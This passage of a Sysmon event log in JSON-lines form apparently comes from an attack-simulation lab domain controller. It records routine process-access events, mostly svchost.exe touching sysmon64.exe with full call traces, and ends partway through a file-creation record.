\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8438,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.678\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.678","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8439,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.678\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.678","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8440,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.678\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.678","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8441,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.678\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.678","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8442,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.678\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.678","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8443,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.678\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.678","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8444,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.678\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.678","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8445,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.678\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-22BE-5F25-0000-0010EF1C1100}\r\nTargetProcessId: 2992\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.678","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-22BE-5F25-0000-0010EF1C1100}","TargetProcessId":"2992","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8446,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:44.740\r\nProcessGuid: {41C8662E-22D0-5F25-0000-0010509D1100}\r\nProcessId: 3536\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\dd0-0\\System.Drawing.dll\r\nCreationUtcTime: 2020-08-01 08:07:44.740","Category":"File created (rule: 